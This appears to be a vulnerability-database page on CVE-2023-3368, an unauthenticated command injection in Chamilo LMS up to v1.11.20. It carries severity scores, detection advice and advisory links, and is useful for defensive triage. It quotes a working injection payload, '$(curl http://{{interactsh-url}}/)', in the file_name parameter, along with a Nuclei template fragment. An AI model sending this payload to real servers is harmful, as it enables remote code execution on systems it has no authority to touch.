CVE-2023-3368
published 2023-11-28CVE-2023-3368: Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution…
PriorityP190critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
68.90%
99.3th percentile
Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution via improper neutralisation of special characters. This is a bypass of CVE-2023-34960.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chamilo | chamilo | < 1.11.20 | 1.11.20 |
| chamilo | chamilo | <= 1.11.20 | — |
Detection & IOCsextracted from sources · hover to see the quote
command$(curl http://{{interactsh-url}}/)
otherwsConvertPptResponse
- →The vulnerable endpoint is unauthenticated — monitor for POST requests to /main/webservices/additional_webservices.php from unauthenticated sessions, especially those containing shell metacharacters (e.g., $(), backticks, semicolons) in the `file_name` parameter. ↗
- →Exploitation uses the SOAP/web-service parameter `file_name` within a `wsConvertPpt` request (PPT-to-LP conversion service). Detect HTTP requests whose body contains `wsConvertPptResponse` in the response body as a confirmation of a successful hit against this endpoint.
- →The PoC payload injects a `$(curl ...)` command substitution into the `file_name` field alongside `service_ppt2lp_size` set to `720x540`. Alert on any `file_name` value containing `$(`, backtick command substitution, or other shell metacharacters in requests to this endpoint.
- →This CVE is an explicit bypass of CVE-2023-34960; if mitigations for CVE-2023-34960 are in place, they may be insufficient. Ensure detection rules cover both CVEs on the same endpoint. ↗
- ·The Nuclei template uses an out-of-band (interactsh) callback to confirm exploitation. In environments where outbound HTTP is blocked, the `$(curl ...)` payload will not produce a detectable callback; use alternative OOB channels or in-band detection (e.g., response timing, error messages) instead.
- ·The vulnerability affects Chamilo LMS versions up to and including v1.11.20. Instances running versions beyond this threshold are not affected by this specific bypass. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-x9xc-jg9p-2j7f: Command injection in `/main/webservices/additional_webservices
ghsa_unreviewed·2023-11-28·CVSS 9.8
CVE-2023-3368 [CRITICAL] CWE-78 GHSA-x9xc-jg9p-2j7f: Command injection in `/main/webservices/additional_webservices
Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution via improper neutralisation of special characters. This is a bypass of CVE-2023-34960.
VulnCheck
chamilo chamilo Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2023·CVSS 9.8
CVE-2023-3368 [CRITICAL] chamilo chamilo Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
chamilo chamilo Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Command injection in `/main/webservices/additional_webservices.php` in Chamilo LMS <= v1.11.20 allows unauthenticated attackers to obtain remote code execution via improper neutralisation of special characters. This is a bypass of CVE-2023-34960.
Affected: chamilo chamilo
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://media.defense.gov/2024/Sep/18/2003547016/-1/-1/0/CSA-PRC-LINKED-ACTORS-BOTNET.PDF; https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2023-3368&date=2025-10-31; https://api.vulncheck.com/v3/index/vulncheck-canaries?c
No detection rules found.
Nuclei
Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
nuclei·CVSS 9.8
CVE-2023-3368 [CRITICAL] Chamilo LMS <= v1.11.20 Unauthenticated Command Injection
Chamilo LMS
file_data
file_name
$(curl http://{{interactsh-url}}/)
service_ppt2lp_size
720x540
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "wsConvertPptResponse"
part: body
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# digest: 4a0a004730450221008f2ffd726769c8f7d9c324ccc248b6b8aed9185b2989dc32a0ad53d39a7d2cc8022077b671f1c2d8806f9ebb0c69ba4449d1fc8bff9d1d85dca290c6b46799beb865:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657ahttps://https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48bhttps://starlabs.sg/advisories/23/23-3368/https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368https://github.com/chamilo/chamilo-lms/commit/37be9ce7243a30259047dd4517c48ff8b21d657ahttps://https://github.com/chamilo/chamilo-lms/commit/4c69b294f927db62092e01b70ac9bd6e32d5b48bhttps://starlabs.sg/advisories/23/23-3368/https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-121-2023-07-05-Critical-impact-High-risk-Unauthenticated-Command-Injection-CVE-2023-3368
2023-11-28
Published
Exploited in the wild